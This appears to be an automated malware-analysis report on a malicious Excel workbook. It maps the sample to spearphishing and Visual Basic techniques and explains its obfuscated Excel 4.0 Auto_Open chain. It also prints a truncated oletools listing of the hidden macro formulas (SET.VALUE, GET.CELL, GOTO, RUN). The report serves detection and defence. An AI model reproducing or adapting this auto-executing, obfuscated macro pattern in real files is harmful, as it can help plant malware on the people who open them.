MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains Excel 4.0 macros, specifically an obfuscated Auto_Open execution chain. The `RUN(EC24422)` command within the macro suggests it is designed to execute arbitrary code, likely downloading and running a second-stage payload. The presence of an Auto_Open macro indicates it was likely delivered as a spearphishing attachment.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAINExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 127549 bytes |
SHA-256: e2e0e2d9400a3b7c3f2f4f7f99f73232325b94ccfcfff8f049f74d461096af6c |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!K44061 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,IG27,"",-1.90825688073394506006 ' Sheet,BD56,"",0.09090909090909091161 ' Sheet,HS71,"",-107.00000000000000000000 ' Sheet,JK83,"SET.VALUE(ES51267,151-GET.CELL(17,EB43877))","" ' Sheet,JK84,RUN(EC24422),"" ' Sheet,GM151,"",-85.00000000000000000000 ' Sheet,IJ167,"",-0.44711538461538463674 ' Sheet,B205,"",-230.00000000000000000000 ' Sheet,JI233,"",6.00000000000000000000 ' Sheet,C234,"",-1.95652173913043481157 ' Sheet,HI272,"",-408.00000000000000000000 ' Sheet,DX304,"",247.00000000000000000000 ' Sheet,JT305,"",3.60784313725490202174 ' Sheet,GN373,"",0.37358590566037730429 ' Sheet,GW379,"",5.05102040816326525174 ' Sheet,HF493,"",323.00000000000000000000 ' Sheet,HC511,"",2.63529411764705878696 ' Sheet,ER548,"",410.00000000000000000000 ' Sheet,JE552,"",0.16363636363636363535 ' Sheet,J555,"",-0.25672371638141811001 ' Sheet,CO583,"",200.00000000000000000000 ' Sheet,BN660,"",-0.21311475409836064254 ' Sheet,FE742,"SET.VALUE(BB8632,GET.CELL(50,EB16762)+-287.00000000000000000000-4)","" ' Sheet,FE743,GOTO(CA55734),"" ' Sheet,DE828,"",-286.00000000000000000000 ' Sheet,DL844,"",-0.93181818181818176772 ' Sheet,GY864,"",-1.70731707317073166941 ' Sheet,BW872,"",-20.40000000000000568434 ' Sheet,BN877,"",0.58695652173913048788 ' Sheet,EH978,"",132.00000000000000000000 ' Sheet,DM992,"",86.00000000000000000000 ' Sheet,HL1111,"",1.68807339449541293774 ' Sheet,DE1128,"",266.00000000000000000000 ' Sheet,HV1170,"",-329.25000000000000000000 ' Sheet,EA1242,"",-125.00000000000000000000 ' Sheet,JH1259,"",2.02197802197802189994 ' Sheet,DV1265,"",-5.59999999999999431566 ' Sheet,FF1295,"",18.75000000000000000000 ' Sheet,FX1346,"",-200.00000000000000000000 ' Sheet,DM1365,"",-2.71929824561403510330 ' Sheet,IB1393,"",-8.18000488281250071054 ' Sheet,IJ1427,"",-183.00000000000000000000 ' Sheet,JE1436,"",0.42391304347826086474 ' Sheet,BJ1457,"SET.VALUE(FC34223,-148.00000000000000000000-GET.CELL(17,HK32871))","" ' Sheet,BJ1458,RUN(H40614),"" ' Sheet,CN1528,"",-259.00000000000000000000 ' Sheet,DN1533,"",-1.96202531645569622221 ' Sheet,BV1536,"",-212.00000000000000000000 ' Sheet,FR1565,"",-225.00000000000000000000 ' Sheet,J1654,"",42.20003906249999658939 ' Sheet,CK1709,"",77.00000000000000000000 ' Sheet,HZ1824,"",-401.00000000000000000000 ' Sheet,JI1971,"",2.33599999999999985434 ' Sheet,GK2024,"",93.00000000000000000000 ' Sheet,IY2117,"",-101.00000000000000000000 ' Sheet,BP2134,"",11.00000000000000000000 ' Sheet,IY2144,"",-0.38620689655172413257 ' Sheet,FH2189,"",2.59016293442622957954 ' Sheet,EX2254,"",-4.50000000000000000000 ' Sheet,FB2358,"",75.00000000000000000000 ' Sheet,BM2359,"",3.40000000000000568434 ' Sheet,M2391,"",258.00000000000000000000 ' Sheet,CG2393,"",454.00000000000000000000 ' Sheet,FY2446,"",-510.00000000000000000000 ' Sheet,DE2473,"",2.22619047619047627506 ' Sheet,BR2564,"",280.00000000000000000000 ' Sheet,EY2567,"",7.38805970149253710133 ' Sheet,BV2573,"",2.59154929577464798740 ' Sheet,ID2595,"",-0.08312958435207823404 ' Sheet,JK2614,"",1.23883928571428580945 ' Sheet,HW2627,"",4.48780387804878078128 ' Sheet,GC2674,"",-93.00000000000000000000 ' Sheet,GY2715,"",-70.75000000000000000000 ' Sheet,M2794,"",-87.20007812500000454747 ' Sheet,HZ2872,"",0.61956521739130432369 ' Sheet,BI2879,"",-182.00000000000000000000 ' Sheet,JM2905,"",186.00000000000000000000 ' Sheet,JS2938,"",0.34545454545454545858 ' Sheet,GH2966,"",-0.20537897310513447691 ' Sheet,HO2995,"",0.22962962962962962798 ' Sheet,CZ3025,"",90.20007812500000454747 ' Sheet,EC3050,"",114.00000000000000000000 ' Sheet,HJ3068,"",-0 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.